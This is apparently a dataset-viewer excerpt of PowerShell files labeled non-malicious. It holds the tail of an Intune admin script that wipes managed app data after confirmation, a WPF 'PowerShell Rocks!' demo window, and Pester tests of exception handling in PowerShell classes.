Write-Host
}
$global:authToken = Get-AuthToken -User $User
}
}
else {
if($User -eq $null -or $User -eq ""){
$User = Read-Host -Prompt "Please specify your user principal name for Azure Authentication"
Write-Host
}
$global:authToken = Get-AuthToken -User $User
}
write-host
write-host "User Principal Name:" -f Yellow
$UPN = Read-Host
$User = Get-AADUser -userPrincipalName $UPN
$UserID = $User.id
write-host
write-host "Display Name:"$User.displayName
write-host "User ID:"$User.id
write-host "User Principal Name:"$User.userPrincipalName
write-host
$ManagedAppReg = Get-AADUserManagedAppRegistrations -id $UserID
if($ManagedAppReg){
$DeviceTag = $ManagedAppReg.deviceTag | sort -Unique
if($DeviceTag.count -eq 1){
$DeviceName = $ManagedAppReg.deviceName
$uri = "https://graph.microsoft.com/beta/users('$UserID')/wipeManagedAppRegistrationByDeviceTag"
$JSON = @"
{
"deviceTag": "$DeviceTag"
}
"@
write-host "Are you sure you want to wipe application data on device $DeviceName`? Y or N?" -f Yellow
$Confirm = read-host
if($Confirm -eq "y" -or $Confirm -eq "Y"){
Invoke-RestMethod -Uri $uri -Headers $authToken -Method Post -Body $JSON -ContentType "application/json"
}
else {
Write-Host
Write-Host "Wipe application data for the device $DeviceName was cancelled..."
Write-Host
}
}
else {
Write-Host "More than one device found with MAM Applications" -ForegroundColor Yellow
Write-Host
$MAM_Devices = $ManagedAppReg.deviceName | sort -Unique
$menu = @{}
for ($i=1;$i -le $MAM_Devices.count; $i++)
{ Write-Host "$i. $($MAM_Devices[$i-1])"
$menu.Add($i,($MAM_Devices[$i-1]))}
Write-Host
[int]$ans = Read-Host 'Enter Device to wipe MAM Data (Numerical value)'
$selection = $menu.Item($ans)
If($selection){
Write-Host "Device selected:"$selection
Write-Host
$SelectedDeviceTag = $ManagedAppReg | ? { $_.deviceName -eq "$Selection" } | sort -Unique | select -ExpandProperty deviceTag
$uri = "https://graph.microsoft.com/beta/users('$UserID')/wipeManagedAppRegistrationByDeviceTag"
$JSON = @"
{
"deviceTag": "$SelectedDeviceTag"
}
"@
write-host "Are you sure you want to wipe application data on this device? Y or N?" -ForegroundColor Yellow
$Confirm = read-host
if($Confirm -eq "y" -or $Confirm -eq "Y"){
Invoke-RestMethod -Uri $uri -Headers $authToken -Method Post -Body $JSON -ContentType "application/json"
}
else {
Write-Host
Write-Host "Wipe application data for this device was cancelled..."
Write-Host
}
}
else {
Write-Host "No device selected..." -ForegroundColor Red
}
Write-Host
}
}
|
combined_dataset/train/non-malicious/Demo-v3-Gui.ps1
|
Demo-v3-Gui.ps1
|
#requires -version 3
[Windows.Window]@{
OpacityMask = [Windows.Media.DrawingBrush]@{
Drawing = [Windows.Media.GeometryDrawing]@{
Brush = 'Black'
Geometry = [Windows.Media.EllipseGeometry]@{
radiusX = 123
radiusY = 321
}
}
}
Background = [Windows.Media.LinearGradientBrush]@{
Opacity = 0.5
StartPoint = '0,0.5'
Endpoint = '1,0.5'
GradientStops = & {
$Stopki = New-Object Windows.Media.GradientStopCollection
$Colors = 'Blue', 'Green'
foreach ($i in 0..1) {
$Stopki.Add(
[Windows.Media.GradientStop]@{
Color = $Colors[$i]
Offset = $i
}
)
}
, $Stopki
}
}
Width = 800
Height = 400
WindowStyle = 'None'
AllowsTransparency = $true
Effect = [Windows.Media.Effects.DropShadowEffect]@{
BlurRadius = 10
}
Content = & {
$Stos = [Windows.Controls.StackPanel]@{
VerticalAlignment = 'Center'
HorizontalAlignment = 'Center'
}
$Stos.AddChild(
[Windows.Controls.Label]@{
Content = 'PowerShell Rocks!'
FontSize = 80
FontFamily = 'Consolas'
Foreground = 'White'
Effect = [Windows.Media.Effects.DropShadowEffect]@{
BlurRadius = 5
}
}
)
, $Stos
}
} | foreach {
$_.Add_MouseLeftButtonDown({
$this.DragMove()
})
$_.Add_MouseRightButtonDown({
$this.Close()
})
$_.ShowDialog()
}
|
combined_dataset/train/non-malicious/2079.ps1
|
2079.ps1
|
Describe 'Exceptions flow for classes' -Tags "CI" {
$canaryHashtable = @{}
$iss = [initialsessionstate]::CreateDefault()
$iss.Variables.Add([System.Management.Automation.Runspaces.SessionStateVariableEntry]::new('canaryHashtable', $canaryHashtable, $null))
$iss.Commands.Add([System.Management.Automation.Runspaces.SessionStateFunctionEntry]::new('Get-Canary', '$canaryHashtable'))
$ps = [powershell]::Create($iss)
BeforeEach {
$canaryHashtable.Clear()
$ps.Commands.Clear()
}
Context 'All calls are inside classes' {
It 'does not execute statements after instance method with exception' {
try {
$ps.AddScript( @'
class C
{
[void] m1()
{
$canaryHashtable = Get-Canary
$canaryHashtable['canary'] = 42
$this.ImThrow()
$canaryHashtable['canary'] = 100
}
[void] ImThrow()
{
throw 'I told you'
}
}
[C]::new().m1()
'@).Invoke()
} catch {}
$canaryHashtable['canary'] | Should -Be 42
}
It 'does not execute statements after static method with exception' {
try {
$ps.AddScript( @'
class C
{
static [void] s1()
{
$canaryHashtable = Get-Canary
$canaryHashtable['canary'] = 43
[C]::ImThrow()
$canaryHashtable['canary'] = 100
}
static [void] ImThrow()
{
1 / 0
}
}
[C]::s1()
'@).Invoke()
} catch {}
$canaryHashtable['canary'] | Should -Be 43
}
It 'does not execute statements after instance method with exception and deep stack' {
try {
$ps.AddScript( @'
class C
{
[void] m1()
{
$canaryHashtable = Get-Canary
$canaryHashtable['canary'] = 1
$this.m2()
$canaryHashtable['canary'] = -6101
}
[void] m2()
{
$canaryHashtable = Get-Canary
$canaryHashtable['canary'] += 10
$this.m3()
$canaryHashtable['canary'] = -6102
}
[void] m3()
{
$canaryHashtable = Get-Canary
$canaryHashtable['canary'] += 100
$this.m4()
$canaryHashtable['canary'] = -6103
}
[void] m4()
{
$canaryHashtable = Get-Canary
$canaryHashtable['canary'] += 1000
$this.ImThrow()
$canaryHashtable['canary'] = -6104
}
[void] ImThrow()
{
$canaryHashtable = Get-Canary
$canaryHashtable['canary'] += 10000
1 / 0
}
}
[C]::new().m1()
'@).Invoke()
} catch {}
$canaryHashtable['canary'] | Should -Be 11111
}
}
Context 'Class method call PS function' {
$body = @'
class C
{
[void] m1()
{
m2
}
static [void] s1()
{
s2
}
}
function m2()
{
$canary = Get-Canary
$canary['canaryM'] = 45
ImThrow
$canary['canaryM'] = 100
}
function s2()
{
$canary = Get-Canary
$canary['canaryS'] = 46
CallImThrow
$canary['canaryS'] = 100
}
function CallImThrow()
{
ImThrow
}
function ImThrow()
{
1 / 0
}
'@
It 'does not execute statements after function with exception called from instance method' {
try {
$ps.AddScript($body).Invoke()
$ps.AddScript('$c = [C]::new(); $c.m1()').Invoke()
} catch {}
$canaryHashtable['canaryM'] | Should -Be 45
}
It 'does not execute statements after function with exception called from static method' {
try {
$ps.AddScript($body).Invoke()
$ps.AddScript('[C]::s1()').Invoke()
} catch {}
$canaryHashtable['canaryS'] | Should -Be 46
}
}
Context "No class is involved" {
It "functions calls continue execution by default" {
try {
$ps.AddScript( @'
$canaryHashtable = Get-Canary
function foo() { 1 / 0; $canaryHashtable['canary'] += 10 }
$canaryHashtable['canary'] = 1
foo
$canaryHashtable['canary'] += 100
'@).Invoke()
} catch {}
$canaryHashtable['canary'] | Should -Be 111
}
}
}
Describe "Exception error position" -Tags "CI" {
class MSFT_3090412
{
static f1() { [MSFT_3090412]::bar = 42 }
static f2() { throw "an error in f2" }
static f3() { "".Substring(0, 10) }
static f4() { Get-ChildItem nosuchfile -ErrorAction Stop }
}
It "Setting a property that doesn't exist" {
$e = { [MSFT_3090412]::f1() } | Should -Throw -PassThru -ErrorId 'PropertyAssignmentException'
$e.InvocationInfo.Line | Should -Match ([regex]::Escape('[MSFT_3090412]::bar = 42'))
}
It "Throwing an exception" {
$e = { [MSFT_3090412]::f2() } | Should -Throw -PassThru -ErrorId 'an error in f2'
$e.InvocationInfo.Line | Should -Match ([regex]::Escape('throw "an error in f2"'))
}
It "Calling a .Net method that throws" {
$e = { [MSFT_3090412]::f3() } | Should -Throw -PassThru -ErrorId 'ArgumentOutOfRangeException'
$e.InvocationInfo.Line | Should -Match ([regex]::Escape('"".Substring(0, 10)'))
}
It "Terminating error" {
$e = { [MSFT_3090412]::f4() } | Should -Throw -PassThru -ErrorId 'PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand'
$e.InvocationInfo.Line | Should -Match ([regex]::Escape('Get-ChildItem nosuchfile -ErrorAction Stop'))
}
}
Describe "Exception from initializer" -Tags "CI" {
class MSFT_6397334a
{
[int]$a = "zz"
MSFT_6397334a() {}
}
class MSFT_6397334b
{
[int]$a = "zz"
}
class MSFT_6397334c
{
static [int]$a = "zz"
static MSFT_6397334a() {}
}
class MSFT_6397334d
{
static [int]$a = "zz"
}
It "instance member w/ ctor" {
$e = { [MSFT_6397334a]::new() } | Should -Throw -ErrorId 'InvalidCastFromStringToInteger' -PassThru
$e.InvocationInfo.Line | Should -Match 'a = "zz"'
}
It "instance member w/o ctor" {
$e = { [MSFT_6397334b]::new() } | Should -Throw -ErrorId 'InvalidCastFromStringToInteger' -PassThru
$e.InvocationInfo.Line | Should -Match 'a = "zz"'
}
It "static member w/ ctor" {
$e = { $null = [MSFT_6397334c]::a } | Should -Throw -PassThru
$e.Exception | Should -BeOfType 'System.TypeInitializationException'
$e.Exception.InnerException.ErrorRecord.FullyQualifiedErrorId | Should -BeExactly 'InvalidCastFromStringToInteger'
$e.Exception.InnerException.InnerException.ErrorRecord.InvocationInfo.Line | Should -Match 'a = "zz"'
}
It "static member w/o ctor" {
$e = { $null = [MSFT_6397334d]::a } | Should -Throw -PassThru
$e.Exception | Should -BeOfType System.TypeInitializationException
$e.Exception.InnerException.InnerException.ErrorRecord.FullyQualifiedErrorId | Should -BeExactly 'InvalidCastFromStringToInteger'
$e.Exception.InnerException.InnerException.ErrorRecord.InvocationInfo.Line | Should -Match 'a = "zz"'
}
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.